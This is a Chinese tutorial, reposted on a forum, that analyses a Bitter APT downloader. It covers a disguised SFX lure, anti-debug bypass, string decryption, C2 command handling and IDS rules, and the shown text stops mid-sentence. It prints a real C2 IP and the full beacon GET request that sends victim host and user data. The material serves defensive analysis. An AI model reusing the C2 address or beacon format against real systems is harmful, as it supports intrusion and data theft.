论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
IOT
[16268] 2020-12-31_手把手教你分析APT:蔓灵花下载器样本分析
文档创建者:
s7ckTeam
浏览次数:
2
最后更新:
2025-01-18
IOT
2 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2020-12-31_手把手教你分析APT:蔓灵花下载器样本分析
手
把
手
教
你
分
析
A
P
T
:
蔓
灵
花
下
载
器
样
本
分
析
建
瓯
最
坏
F
r
e
e
B
u
f
2
0
2
0
-
1
2
-
3
1
分
析
到
一
个
简
单
又
经
典
的
样
本
,
想
想
最
近
比
较
无
聊
就
好
好
写
写
A
P
T
分
析
的
部
分
吧
!
本
文
仅
从
样
本
分
析
角
度
出
发
,
样
本
来
源
以
及
溯
源
部
分
就
不
多
啰
嗦
了
(
写
了
但
是
太
长
了
,
一
起
发
阅
读
性
很
差
就
不
发
了
,
而
且
也
不
是
很
有
代
表
性
,
以
后
有
机
会
发
个
别
的
。
)
初
始
载
荷
信
息
初
始
载
荷
信
息
攻
击
的
初
始
载
荷
是
一
个
文
件
名
为
双
后
缀
名
的
文
件
“
开
证
装
期
邮
件
.
p
d
f
.
e
x
e
”
,
这
是
一
种
常
见
的
文
件
伪
装
方
式
,
利
用
W
i
n
d
o
w
s
的
扩
展
名
显
示
设
置
(
“
隐
藏
已
知
文
件
类
型
的
扩
展
名
”
)
伪
装
真
实
的
.
e
x
e
后
缀
,
再
选
择
高
级
自
解
压
选
项
中
自
定
义
自
解
压
文
件
图
标
,
选
择
让
e
x
e
文
件
看
起
来
像
P
D
F
文
档
,
诱
骗
用
户
打
开
。
不
过
由
于
自
解
压
格
式
的
图
标
来
源
于
文
件
,
而
不
是
系
统
自
带
的
图
标
:
时
常
出
现
画
风
不
同
的
C
位
出
道
场
面
(
一
看
就
是
自
带
剧
本
的
)
:
V
T
搜
索
该
文
件
M
D
5
可
以
看
到
有
5
2
/
6
9
的
高
检
测
率
,
匹
配
的
Y
A
R
A
规
则
名
可
以
解
释
为
隐
藏
为
P
D
F
的
S
F
X
自
解
压
文
件
:
S
F
X
自
解
压
文
件
,
是
一
种
压
缩
软
件
生
成
的
e
x
e
文
件
,
拥
有
执
行
后
可
以
解
压
释
放
文
件
并
执
行
的
特
性
,
通
常
被
病
毒
文
件
用
来
捆
绑
掩
饰
文
档
或
其
他
白
文
件
进
行
伪
装
。
可
将
文
件
后
缀
改
为
r
a
r
,
使
用
压
缩
软
件
打
开
,
查
看
其
中
的
文
件
和
相
关
代
码
和
解
压
,
或
者
在
文
件
属
性
的
注
释
中
也
可
以
看
到
。
如
本
文
中
的
样
本
运
行
后
会
在
“
C
:
i
n
t
e
l
l
o
g
s
”
路
径
下
释
放
“
d
l
h
o
s
t
.
e
x
e
”
并
执
行
:
直
接
双
击
运
行
e
x
e
使
初
始
载
荷
在
指
定
路
径
下
释
放
文
件
也
行
,
多
一
个
步
骤
要
找
一
下
文
件
。
一
般
来
说
解
压
比
较
方
便
,
但
是
有
些
样
本
会
检
测
是
否
在
设
置
的
目
录
下
运
行
,
不
是
则
退
出
,
分
析
时
需
注
意
这
一
点
(
本
文
样
本
无
此
检
测
)
。
有
效
载
荷
有
效
载
荷
d
l
h
o
s
t
.
e
x
e
结
论
先
行
,
带
入
结
论
看
内
容
比
较
容
易
看
进
去
。
“
d
l
h
o
s
t
.
e
x
e
”
经
过
分
析
后
发
现
为
A
P
T
组
织
蔓
灵
花
常
用
的
下
载
器
,
用
来
收
集
受
害
者
计
算
机
信
息
和
创
建
套
接
字
通
信
,
从
远
程
服
务
器
下
载
插
件
完
成
其
他
功
能
的
操
作
。
在
分
析
之
前
,
建
议
先
做
一
些
准
备
工
作
,
磨
刀
不
误
砍
柴
工
~
去
除
随
机
基
址
去
除
随
机
基
址
由
于
P
E
的
特
性
,
程
序
有
基
址
随
机
化
的
问
题
,
那
么
在
分
析
前
,
需
要
查
看
并
修
改
为
不
随
机
的
情
况
,
便
于
下
断
点
分
析
后
调
试
的
配
置
文
件
(
.
u
d
d
)
在
重
新
运
行
后
还
能
生
效
。
方
式
有
多
种
,
比
较
简
单
的
是
使
用
0
1
0
E
d
i
t
o
r
查
看
P
E
文
件
,
将
在
P
E
结
构
中
有
字
段
“
(
N
t
H
e
a
d
e
r
→
O
p
t
i
o
n
a
l
H
e
a
d
e
r
→
D
l
l
C
h
a
r
a
c
t
e
r
i
s
t
i
c
s
→
)
I
M
A
G
E
_
D
L
L
C
H
A
R
A
C
T
E
R
I
S
T
I
C
S
_
D
Y
N
A
M
I
C
_
B
A
S
E
”
,
如
果
数
值
为
1
,
即
开
启
了
“
基
址
重
定
位
”
(
动
态
随
机
基
址
)
,
现
将
其
修
改
为
0
后
保
存
文
件
:
也
可
以
自
己
写
脚
本
或
者
可
执
行
程
序
将
其
修
改
。
查
看
断
点
查
看
断
点
如
果
没
有
特
地
隐
藏
或
者
处
理
要
使
用
的
函
数
的
情
况
(
可
“
一
般
”
是
有
的
)
,
查
看
I
D
A
的
导
入
表
窗
口
中
显
示
的
函
数
,
可
以
推
测
出
一
些
功
能
,
发
现
有
:
1
.
套
接
字
通
信
的
函
数
,
那
么
存
在
套
接
字
通
信
(
好
绕
)
:
2
.
文
件
操
作
函
数
,
包
括
创
建
/
打
开
、
读
取
和
写
入
等
。
可
以
推
测
有
创
建
文
件
、
读
取
文
件
、
移
动
文
件
等
操
作
:
3
.
获
取
信
息
操
作
:
那
么
此
时
可
以
通
过
导
入
表
有
个
初
步
的
判
断
,
这
是
一
个
有
获
取
计
算
机
和
用
户
信
息
,
并
且
有
文
件
操
作
的
联
网
恶
意
软
件
—
—
基
本
上
已
经
可
以
推
测
出
这
是
下
载
器
或
文
件
窃
取
器
了
。
反
调
试
反
调
试
一
般
来
说
恶
意
软
件
都
会
有
反
调
试
功
能
,
反
调
试
的
方
向
也
分
多
类
,
如
:
探
测
W
i
n
d
o
w
s
调
试
器
、
识
别
调
试
器
行
为
、
干
扰
调
试
器
的
功
能
等
。
在
《
恶
意
代
码
分
析
实
战
》
第
1
6
章
反
调
试
技
术
、
《
逆
向
工
程
核
心
原
理
》
第
5
1
章
静
态
反
调
试
技
术
&
第
5
2
章
动
态
反
调
试
技
术
都
有
详
细
介
绍
,
一
般
工
作
中
遇
到
“
S
l
e
e
p
”
和
“
I
s
D
e
b
u
g
g
e
r
P
r
e
s
e
n
t
”
比
较
多
。
本
样
本
虽
无
干
扰
调
试
的
“
S
l
e
e
p
”
,
但
有
检
测
调
试
环
境
的
“
I
s
D
e
b
u
g
g
e
r
P
r
e
s
e
n
t
”
,
问
题
不
大
,
“
1
5
P
B
O
D
”
的
插
件
大
礼
包
中
“
H
i
d
e
D
e
b
u
g
g
e
r
”
已
将
该
函
数
的
返
回
值
H
O
O
K
,
即
反
反
调
试
(
狗
头
)
:
对
对
A
P
I
下
断
并
检
查
下
断
并
检
查
将
样
本
拖
入
O
D
后
,
对
敏
感
A
P
I
函
数
下
断
,
如
:
接
着
可
以
“
A
l
t
+
B
”
或
菜
单
栏
下
的
“
B
”
(
B
r
e
a
k
,
断
点
之
意
)
,
查
看
已
下
的
断
点
,
想
取
消
断
点
时
从
这
里
也
可
以
快
速
的
找
到
:
查
看
后
“
A
l
t
+
C
”
或
菜
单
栏
下
的
“
C
”
,
可
返
回
反
汇
编
窗
口
。
查
看
函
数
调
用
查
看
函
数
调
用
返
回
后
可
以
使
用
右
键
“
查
找
”
功
能
中
的
“
所
有
模
块
间
的
调
用
”
,
查
看
有
无
异
常
情
况
(
那
当
然
是
有
的
)
:
大
事
不
妙
!
异
常
就
是
大
量
调
用
动
态
获
取
函
数
地
址
的
“
G
e
t
M
o
d
u
l
e
H
a
n
d
l
e
W
”
+
“
G
e
t
P
r
o
c
A
d
d
r
e
s
s
”
,
这
是
一
种
常
见
的
规
避
检
测
的
方
式
,
并
且
也
是
一
种
反
静
态
分
析
手
段
:
在
I
D
A
处
找
到
对
应
的
函
数
或
代
码
后
,
使
用
I
D
A
的
脚
本
功
能
(
S
h
i
f
t
+
F
2
)
:
套
接
字
通
信
中
发
送
数
据
的
“
s
e
n
d
”
;
文
件
操
作
的
“
C
r
e
a
t
e
F
i
l
e
W
”
、
“
R
e
a
d
F
i
l
e
”
和
“
W
r
i
t
e
F
i
l
e
”
;
用
于
执
行
恶
意
载
荷
或
命
令
的
“
S
h
e
l
l
E
x
e
c
u
t
e
A
”
等
。
使
用
I
D
A
的
重
命
名
函
数
“
M
a
k
e
N
a
m
e
E
X
”
编
写
的
命
令
“
M
a
k
e
N
a
m
e
E
x
(
l
o
n
g
e
a
,
s
t
r
i
n
g
n
a
m
e
,
l
o
n
g
f
l
a
g
s
)
;
”
。
可
以
用
N
o
t
e
p
a
d
+
+
/
E
x
c
e
l
等
编
辑
工
具
或
P
y
t
h
o
n
/
B
A
T
脚
本
,
将
命
令
批
量
化
处
理
后
如
下
,
复
制
粘
贴
后
R
U
N
:
将
地
址
进
行
重
命
名
,
便
于
静
态
分
析
:
出
现
个
别
因
为
已
有
该
名
称
所
以
冲
突
不
能
重
命
名
的
,
单
独
重
命
名
(
N
键
)
一
下
即
可
:
调
试
运
行
调
试
运
行
I
D
A
导
出
表
可
以
查
看
到
主
函
数
“
S
t
a
r
t
”
地
址
,
下
断
后
F
9
可
直
接
运
行
到
断
点
处
,
进
行
调
试
分
析
。
解
密
操
作
解
密
操
作
在
I
D
A
界
面
还
可
以
发
现
比
较
重
要
的
功
能
代
码
在
函
数
4
0
1
C
8
0
处
,
其
中
有
大
量
的
i
f
+
D
o
W
h
i
l
e
循
环
解
密
(
解
密
方
式
-
=
0
x
D
)
,
问
题
不
大
,
在
解
密
函
数
完
成
后
的
那
行
代
码
下
断
:
此
处
建
议
看
看
解
密
出
的
内
存
都
是
什
么
数
据
,
如
果
发
现
特
殊
的
字
符
串
或
数
据
需
要
特
地
跟
踪
一
下
。
比
如
此
样
本
中
解
密
的
部
分
数
据
就
很
明
显
包
括
注
册
表
路
径
、
外
连
的
U
R
L
字
符
串
、
和
一
串
疑
似
指
令
的
字
符
串
“
Y
e
s
f
i
l
e
”
。
这
其
实
就
是
解
密
出
了
配
置
文
件
:
环
境
检
测
环
境
检
测
如
上
上
图
所
示
,
解
密
后
就
调
用
“
C
r
e
a
t
e
S
e
m
a
p
h
o
r
e
A
”
创
建
信
号
量
“
7
t
5
6
y
r
5
4
r
”
,
接
着
调
用
“
G
e
t
L
a
s
t
E
r
r
o
r
”
检
测
信
号
量
是
否
创
建
成
功
,
如
果
错
误
码
为
定
义
“
E
R
R
O
R
_
A
L
R
E
A
D
Y
_
E
X
I
S
T
S
”
的
1
8
3
(
0
x
B
7
)
,
即
代
表
内
存
中
已
存
在
运
行
中
的
该
进
程
,
那
么
其
后
续
的
函
数
4
0
C
2
3
4
必
然
是
退
出
进
程
函
数
(
或
者
有
可
能
进
入
扰
乱
分
析
或
者
伪
装
功
能
的
代
码
)
:
通
常
恶
意
的
可
执
行
文
件
会
通
过
C
r
e
a
t
e
M
u
t
e
x
创
建
互
斥
体
或
C
r
e
a
t
e
S
e
m
a
p
h
o
r
e
创
建
信
号
量
(
蔓
灵
花
该
下
载
器
都
是
用
信
号
量
)
+
“
G
e
t
L
a
s
t
E
r
r
o
r
”
获
取
错
误
码
的
方
式
让
恶
意
进
程
在
内
存
中
保
持
唯
一
运
行
的
状
态
,
避
免
互
相
干
扰
。
那
么
由
此
可
以
逆
推
,
其
实
主
要
的
功
能
代
码
,
一
般
是
在
判
断
完
互
斥
体
或
信
号
量
后
的
部
分
那
么
由
此
可
以
逆
推
,
其
实
主
要
的
功
能
代
码
,
一
般
是
在
判
断
完
互
斥
体
或
信
号
量
后
的
部
分
(
或
者
其
他
检
测
行
为
后
)
。
时
间
比
较
紧
迫
的
情
况
,
可
以
考
虑
定
位
到
检
测
+
“
G
e
t
L
a
s
t
E
r
r
o
r
”
后
,
“
i
f
”
判
断
不
成
立
的
逻
辑
条
件
进
行
分
析
。
由
于
本
人
调
试
分
析
时
,
常
利
用
火
绒
剑
等
监
测
工
具
监
测
后
台
运
行
的
该
进
程
,
故
“
G
e
t
L
a
s
t
E
r
r
o
r
”
的
返
回
值
为
0
x
B
7
,
此
步
可
以
通
过
修
改
寄
存
器
的
Z
F
标
志
位
跳
过
此
步
跳
转
:
网
络
行
为
网
络
行
为
初
始
化
操
作
和
解
密
操
作
等
非
恶
意
功
能
代
码
比
较
多
,
先
用
I
D
A
找
比
较
重
要
的
函
数
分
析
,
再
用
O
D
按
F
4
到
C
A
L
L
行
查
看
其
传
入
的
参
数
,
如
外
连
“
h
t
t
p
:
/
/
1
6
2
.
0
.
2
2
9
.
2
0
3
/
R
g
u
h
s
T
/
R
g
u
h
s
T
/
”
:
由
于
分
析
时
大
部
分
情
况
是
不
建
议
联
网
的
,
且
有
可
能
外
连
的
域
名
或
I
P
已
失
效
,
在
套
接
字
通
信
后
的
i
f
判
断
处
修
改
跳
转
。
不
跳
就
结
束
嘞
(
“
T
a
b
”
键
查
看
流
程
图
或
者
在
“
G
r
a
p
h
o
v
e
r
v
i
e
w
”
中
可
以
看
出
,
如
果
不
跳
就
跳
过
大
段
代
码
结
束
了
)
:
将
光
标
定
位
到
“
i
f
”
判
断
c
o
n
n
e
c
t
返
回
的
结
果
处
,
按
“
T
a
b
”
键
查
看
I
D
A
的
反
汇
编
窗
口
,
可
以
看
到
“
i
f
”
的
关
键
地
址
是
“
0
x
4
0
3
6
7
8
”
,
下
断
运
行
到
此
处
后
修
改
Z
F
标
志
位
,
让
其
不
跳
转
即
可
:
数
据
及
其
来
源
数
据
及
其
来
源
套
接
字
连
接
成
功
后
的
第
一
个
函
数
4
0
2
F
4
0
里
调
用
了
系
统
A
P
I
“
G
e
t
C
o
m
p
u
t
e
r
N
a
m
e
A
”
,
查
看
其
保
存
获
取
到
数
据
C
o
m
p
u
t
e
r
N
a
m
e
在
何
处
被
引
用
,
发
现
函
数
4
0
2
F
4
0
末
尾
有
大
量
调
用
同
一
函
数
4
0
C
3
1
8
和
同
一
内
存
地
址
0
x
4
3
5
5
9
8
。
在
“
G
e
t
C
o
m
p
u
t
e
r
N
a
m
e
A
”
和
函
数
4
0
C
3
1
8
间
,
这
部
分
代
码
中
有
“
G
e
t
U
s
e
r
N
a
m
e
A
”
、
“
R
e
g
Q
u
e
r
y
V
a
l
u
e
E
x
A
”
、
和
“
G
e
t
S
y
s
t
e
m
I
n
f
o
”
等
获
取
信
息
的
函
数
后
,
推
测
函
数
4
0
2
F
4
0
为
计
算
机
信
息
的
字
符
串
拼
接
:
有
了
这
个
推
测
后
,
在
最
后
一
次
调
用
4
0
C
3
1
8
处
下
断
,
数
据
窗
口
监
视
对
应
的
首
参
内
存
地
址
“
0
x
4
3
5
5
9
8
”
:
确
实
拼
接
出
带
有
计
算
机
信
息
的
字
符
串
“
?
a
=
H
o
s
t
N
a
m
e
&
b
=
C
O
M
P
U
T
E
R
N
A
M
E
&
c
=
W
i
n
d
o
w
s
%
2
0
7
%
2
0
P
r
o
f
e
s
s
i
o
n
a
l
&
d
=
A
d
m
i
n
i
s
t
r
a
t
o
r
A
d
m
i
n
i
s
t
r
a
t
o
r
f
9
1
1
7
a
5
d
-
b
1
5
5
-
4
a
3
e
-
b
6
c
9
-
5
a
e
1
8
1
2
4
7
d
3
b
1
6
5
5
3
6
0
4
0
9
6
5
8
6
0
”
,
可
以
分
解
为
以
下
的
格
式
:
其
中
d
值
比
较
奇
怪
,
使
用
交
叉
引
用
查
看
该
写
入
值
的
调
用
,
可
以
发
现
其
值
为
U
s
e
r
N
a
m
e
和
调
用
“
R
e
g
Q
u
e
r
y
V
a
l
u
e
E
x
A
”
获
取
的
G
U
I
D
:
以
懒
人
思
维
来
说
,
定
位
这
类
数
据
来
源
的
步
骤
是
可
以
省
略
的
,
仅
需
将
计
算
机
信
息
(
如
计
算
机
名
,
用
户
名
,
将
计
算
机
信
息
(
如
计
算
机
名
,
用
户
名
,
M
A
C
地
址
、
地
址
、
I
P
地
址
、
地
址
、
G
U
I
D
、
甚
至
是
偏
门
如
、
甚
至
是
偏
门
如
C
盘
卷
序
列
号
的
数
据
)
修
改
或
记
盘
卷
序
列
号
的
数
据
)
修
改
或
记
录
其
数
据
即
可
。
录
其
数
据
即
可
。
上
面
图
中
显
示
的
调
试
环
境
的
计
算
机
就
是
如
此
,
一
般
分
析
了
这
么
多
样
本
,
看
到
自
己
的
G
U
I
D
数
据
也
能
认
出
来
,
只
是
为
了
演
示
一
下
如
何
交
叉
引
用
定
位
。
或
记
住
G
U
I
D
格
式
为
“
x
x
x
x
x
x
x
x
-
x
x
x
x
-
x
x
x
x
-
x
x
x
x
-
x
x
x
x
x
x
x
x
x
x
x
x
”
(
8
-
4
-
4
-
4
-
1
2
)
。
所
以
d
值
的
数
据
为
[
U
s
e
r
N
a
m
e
]
[
U
s
e
r
N
a
m
e
]
[
G
U
I
D
]
[
d
w
A
c
t
i
v
e
P
r
o
c
e
s
s
o
r
M
a
s
k
]
[
d
w
A
l
l
o
c
a
t
i
o
n
G
r
a
n
u
l
a
r
i
t
y
]
[
d
w
O
e
m
I
d
]
[
d
w
P
a
g
e
S
i
z
e
]
[
d
w
P
r
o
c
e
s
s
o
r
T
y
p
e
]
[
w
P
r
o
c
e
s
s
o
r
A
r
c
h
i
t
e
c
t
u
r
e
]
,
现
在
又
可
以
把
[
d
w
A
c
t
i
v
e
P
r
o
c
e
s
s
o
r
M
a
s
k
]
[
d
w
A
l
l
o
c
a
t
i
o
n
G
r
a
n
u
l
a
r
i
t
y
]
[
d
w
O
e
m
I
d
]
[
d
w
P
a
g
e
S
i
z
e
]
[
d
w
P
r
o
c
e
s
s
o
r
T
y
p
e
]
[
w
P
r
o
c
e
s
s
o
r
A
r
c
h
i
t
e
c
t
u
r
e
]
数
据
记
到
小
本
本
里
了
~
数
据
使
用
数
据
使
用
a
=
[
H
o
s
t
N
a
m
e
]
b
=
[
C
o
m
p
u
t
e
r
N
a
m
e
]
c
=
[
电
脑
系
统
信
息
]
d
=
[
U
s
e
r
N
a
m
e
]
[
G
U
I
D
]
将
I
D
A
中
该
储
存
计
算
机
数
据
的
内
存
地
址
重
命
名
后
,
查
看
该
内
存
地
址
的
交
叉
引
用
可
以
发
现
被
多
个
函
数
调
用
,
而
最
后
一
个
调
用
的
函
数
4
0
1
0
8
0
,
该
函
数
的
首
参
(
通
常
是
比
较
重
要
的
参
数
)
后
续
成
为
了
“
S
e
n
d
”
函
数
参
数
中
要
发
送
的
数
据
缓
冲
区
,
此
处
可
以
推
测
4
0
1
0
8
0
函
数
为
拼
接
待
发
送
数
据
:
跳
转
到
调
用
4
0
1
0
8
0
处
,
可
以
明
显
看
到
是
构
建
G
E
T
方
法
的
H
T
T
P
报
文
数
据
。
其
实
不
用
跳
转
,
通
过
传
参
的
数
量
/
格
式
和
前
后
调
用
的
函
数
其
实
也
可
以
推
测
出
这
段
代
码
是
构
建
H
T
T
P
报
文
:
S
e
n
d
发
送
上
线
包
发
送
上
线
包
查
看
“
S
e
n
d
”
函
数
的
要
发
送
的
数
据
缓
冲
区
(
第
二
个
参
数
地
址
)
,
可
以
看
到
拼
接
好
要
发
送
的
数
据
:
木
马
程
序
发
送
的
第
一
个
包
还
带
有
计
算
机
信
息
的
,
通
常
可
以
叫
做
上
线
包
:
此
处
可
以
发
现
有
比
较
明
显
的
流
量
特
征
,
家
里
有
沙
箱
/
流
量
检
测
设
备
的
同
学
可
以
设
置
为
流
量
检
测
规
则
:
这
个
规
则
的
误
报
率
估
计
不
低
,
给
c
值
加
上
“
W
i
n
d
o
w
s
”
可
以
降
低
一
些
误
报
率
如
果
家
里
有
条
件
的
同
学
,
可
以
以
安
全
研
究
/
A
P
T
追
踪
发
现
的
角
度
设
置
该
流
量
规
则
,
然
后
再
过
一
遍
沙
箱
规
则
或
Y
A
R
A
规
则
;
如
果
是
部
署
到
客
户
现
场
的
流
量
检
测
设
备
,
则
不
建
议
部
署
。
沙
箱
如
果
像
我
的
调
试
环
境
一
样
用
户
名
电
脑
名
主
机
名
是
固
定
字
符
串
的
话
,
再
写
死
对
其
他
值
的
判
断
,
基
本
就
没
有
误
报
了
。
除
非
这
个
上
线
包
来
自
开
源
项
目
,
被
很
多
恶
意
软
件
使
用
,
那
就
需
要
增
加
其
他
判
断
条
件
,
此
步
在
下
文
的
“
通
过
V
T
扩
线
”
中
有
详
述
。
R
e
c
v
接
受
返
回
数
据
接
受
返
回
数
据
一
般
“
S
e
n
d
”
发
送
上
线
包
后
就
是
“
R
e
c
v
”
从
远
程
服
务
器
接
受
命
令
或
文
件
,
查
看
“
R
e
c
v
”
从
远
程
服
务
器
获
取
的
数
据
有
什
么
交
叉
引
用
,
发
现
函
数
4
0
8
5
5
0
明
显
有
C
2
指
令
判
断
:
有
部
分
内
存
数
据
为
运
行
后
才
被
解
密
的
字
符
串
,
可
以
在
上
述
的
字
符
串
解
密
操
作
后
,
在
I
D
A
里
将
对
应
的
内
存
地
址
重
命
名
,
或
者
在
动
态
运
行
时
已
经
是
解
密
后
的
数
据
。
为
了
进
入
预
定
义
C
2
指
令
的
逻
辑
,
可
以
在
“
R
e
c
v
”
执
行
后
将
函
数
4
0
8
5
5
0
的
第
二
个
参
数
手
动
修
改
为
“
Y
e
s
f
i
l
e
”
,
或
者
修
改
字
符
串
对
比
判
断
后
的
跳
转
也
行
,
具
体
看
后
续
执
行
的
代
码
,
本
样
本
直
接
修
改
跳
转
更
方
便
:
G
E
T
/
/
/
R
g
u
h
s
T
/
a
c
c
e
p
t
.
p
h
p
?
a
=
H
o
s
t
N
a
m
e
&
b
=
C
O
M
P
U
T
E
R
N
A
M
E
&
c
=
W
i
n
d
o
w
s
%
2
0
7
%
2
0
P
r
o
f
e
s
s
i
o
n
a
l
&
d
=
A
d
m
i
n
i
s
t
r
a
t
o
r
A
d
m
i
n
i
s
t
r
a
t
o
r
f
9
1
1
7
a
5
d
-
b
1
5
5
-
4
a
3
e
-
b
6
c
9
-
5
a
e
1
8
1
2
4
7
d
3
b
1
6
5
5
3
6
0
4
0
9
6
5
8
6
0
&
e
=
e
f
g
h
H
T
T
P
/
1
.
1
H
o
s
t
:
1
6
2
.
0
.
2
2
9
.
2
0
3
特
征
:
h
t
t
p
_
u
r
l
=
?
a
=
*
b
=
*
c
=
*
e
=
U
R
L
编
码
后
:
h
t
t
p
_
u
r
l
=
a
%
3
d
*
b
%
3
d
*
c
%
3
d
*
d
%
3
d
加
上
G
E
T
方
法
为
:
h
t
t
p
_
u
r
l
=
a
%
3
d
*
b
%
3
d
*
c
%
3
d
*
d
%
3
d
&
h
t
t
p
_
m
e
t
h
o
d
=
G
E
T
h
t
t
p
_
u
r
l
=
a
%
3
d
*
b
%
3
d
*
c
%
3
d
W
i
n
d
o
w
s
*
d
%
3
d
&
h
t
t
p
_
m
e
t
h
o
d
=
G
E
T
一
般
接
收
C
2
指
令
后
的
判
断
处
建
议
做
个
快
照
,
看
看
跳
不
跳
转
分
别
执
行
了
哪
些
功
能
。
如
当
有
多
个
C
2
指
令
进
入
不
同
的
逻
辑
分
支
执
行
不
同
的
代
码
时
,
分
析
完
其
中
一
个
跳
转
后
可
以
恢
复
快
照
,
通
过
修
改
跳
转
或
下
一
跳
地
址
(
E
I
P
)
无
缝
衔
接
分
析
下
一
个
分
支
逻
辑
。
该
样
本
如
果
不
满
足
“
Y
e
s
f
i
l
e
”
指
令
后
的
代
码
逻
辑
就
是
退
出
,
此
处
不
做
展
示
。
进
入
“
Y
e
s
f
i
l
e
”
的
代
码
逻
辑
后
,
可
以
明
显
看
到
有
大
量
对
接
收
数
据
的
操
作
,
如
提
取
数
据
的
代
码
:
i
f
判
断
长
度
+
D
o
W
h
i
l
e
循
环
中
嵌
套
一
个
i
f
判
断
数
据
,
最
后
m
e
m
m
o
v
e
保
存
:
由
于
数
据
不
方
便
公
开
及
教
学
意
义
,
此
处
按
照
无
法
获
取
数
据
的
情
况
进
行
接
下
来
的
分
析
。
对
接
受
的
数
据
结
合
上
下
文
代
码
进
行
推
测
:
1
.
一
般
来
说
,
对
数
据
进
行
各
种
提
取
/
解
密
/
判
断
后
的
最
后
一
个
内
存
块
地
址
0
x
4
3
5
1
F
7
可
以
优
先
分
析
。
发
现
最
后
被
操
作
的
内
存
块
在
后
续
代
码
中
被
函
数
4
0
E
B
6
1
多
次
调
用
;
2
.
函
数
4
0
E
B
6
1
最
后
一
次
调
用
的
首
参
,
同
时
也
是
字
符
串
拼
接
函
数
“
s
t
r
c
a
t
”
的
首
参
,
而
拼
接
的
另
一
个
字
符
串
为
解
密
后
的
字
符
串
“
.
e
x
e
”
;
3
.
那
么
可
以
推
测
该
文
件
为
一
个
e
x
e
文
件
,
查
看
其
交
叉
引
用
,
发
现
是
执
行
程
序
的
函
数
“
S
h
e
l
l
E
x
e
c
u
t
e
A
”
的
参
数
,
并
且
执
行
动
作
的
参
数
为
“
o
p
e
n
”
—
—
也
就
是
运
行
了
一
个
E
X
E
文
件
:
而
在
调
试
器
运
行
到
“
S
h
e
l
l
E
x
e
c
u
t
e
A
”
之
前
,
中
间
大
部
分
的
函
数
为
对
文
件
的
一
些
操
作
,
可
能
会
触
发
一
系
列
文
件
操
作
函
数
,
这
一
步
调
试
分
析
的
意
义
不
是
很
大
。
从
远
程
服
务
器
获
取
数
据
到
本
地
执
行
的
这
个
过
程
,
或
许
有
文
件
解
密
操
作
,
通
过
逆
出
解
密
算
法
,
可
以
还
原
出
P
E
文
件
的
加
密
数
据
(
或
者
从
流
量
里
D
u
m
p
)
,
写
出
下
载
加
密
P
E
文
件
的
流
量
规
则
。
至
此
,
该
样
本
的
功
能
已
经
很
清
晰
了
,
下
载
器
运
行
后
会
收
集
受
害
机
器
的
信
息
拼
接
为
字
符
串
,
构
建
上
线
包
发
送
给
远
程
服
务
器
,
从
远
程
服
务
器
获
取
e
x
e
文
件
的
数
据
并
运
行
。
这
种
有
外
连
下
载
e
x
e
运
行
操
作
的
恶
意
文
件
通
常
归
类
为
下
载
器
(
D
o
w
n
l
o
a
d
e
r
/
L
o
a
d
e
r
)
,
A
P
T
组
织
蔓
灵
花
常
使
用
下
载
器
在
受
害
机
器
上
安
装
其
他
的
恶
意
功
能
插
件
,
如
键
盘
记
录
器
、
文
件
记
录
器
或
者
远
控
木
马
。
一
般
这
些
文
件
存
放
在
下
载
器
发
送
上
线
包
的
远
程
服
务
器
下
,
此
时
通
过
V
T
搜
索
I
P
或
者
域
名
,
查
看
其
关
联
文
件
,
可
能
会
有
收
获
。
通
过
通
过
V
T
扩
线
扩
线
搜
索
远
程
服
务
器
I
P
“
1
6
2
.
0
.
2
2
9
.
2
0
3
”
,
在
“
R
e
l
a
t
i
o
n
s
”
,
可
以
看
到
多
个
域
名
,
部
分
字
符
串
“
p
o
p
3
”
、
“
w
e
b
m
a
i
l
”
、
“
m
a
i
l
”
和
邮
件
服
务
相
关
,
符
合
钓
鱼
邮
件
攻
击
的
信
息
:
“
C
o
m
m
u
n
i
c
a
t
i
n
g
F
i
l
e
s
”
下
也
有
多
个
关
联
文
件
,
通
过
时
间
可
以
发
现
来
自
多
个
攻
击
活
动
:
点
开
关
联
文
件
中
其
他
攻
击
活
动
的
样
本
的
“
B
e
h
a
v
i
o
r
”
,
可
以
发
现
有
两
个
比
较
固
定
的
信
息
。
1
.
G
E
T
请
求
的
U
R
L
:
2
.
释
放
文
件
到
“
C
:
i
n
t
e
l
l
o
g
s
d
l
h
o
s
t
.
e
x
e
”
:
通
过
上
面
两
个
信
息
,
写
沙
箱
规
则
可
以
比
较
准
确
地
抓
到
初
始
攻
击
初
始
攻
击
载
荷
:
在
I
P
的
“
D
e
t
a
i
l
s
”
页
面
可
以
看
到
其
“
G
o
o
g
l
e
R
e
s
u
l
t
s
”
中
,
有
关
联
到
蔓
灵
花
历
史
攻
击
活
动
的
报
告
,
以
及
在
线
沙
箱
跑
出
的
带
有
该
I
P
的
报
告
:
从
以
往
攻
击
活
动
的
在
线
沙
箱
报
告
中
可
以
看
到
其
他
插
件
的
信
息
,
如
在
%
T
E
M
P
%
路
径
下
释
放
文
件
“
r
g
d
l
.
e
x
e
”
,
该
文
件
有
P
D
B
信
息
“
D
:
C
+
+
R
e
g
_
E
n
t
r
y
r
e
g
_
e
n
R
e
l
e
a
s
e
r
e
g
_
e
n
.
p
d
b
”
,
在
蔓
灵
花
早
期
的
攻
击
中
曾
名
为
“
r
e
g
d
l
”
:
“
r
g
d
l
.
e
x
e
”
是
一
个
注
册
表
操
作
器
,
将
“
a
u
d
i
o
d
q
.
e
x
e
”
路
径
写
入
注
册
表
的
R
u
n
项
,
用
于
建
立
恶
意
可
执
行
程
序
(
“
a
u
d
i
o
d
q
.
e
x
e
”
)
的
开
机
自
启
动
:
上
述
两
个
e
x
e
都
是
可
以
通
过
在
线
网
站
扩
线
到
的
蔓
灵
花
常
用
的
插
件
。
再
搜
索
这
两
个
字
符
串
进
行
扩
线
,
可
以
找
到
更
多
的
历
史
攻
击
载
荷
、
开
源
情
报
、
甚
至
更
完
整
的
攻
击
活
动
报
告
。
从
开
源
情
报
中
发
现
该
下
载
器
被
命
名
为
“
A
r
t
r
a
D
o
w
n
l
o
a
d
e
r
”
,
源
自
2
0
1
9
年
P
a
l
o
A
l
t
o
N
e
t
w
o
r
k
s
公
开
发
布
的
报
告
:
利
用
收
集
到
的
信
息
,
组
合
搜
索
到
以
往
历
史
攻
击
活
动
,
发
现
多
个
本
次
活
动
未
出
现
的
插
件
,
如
键
盘
记
录
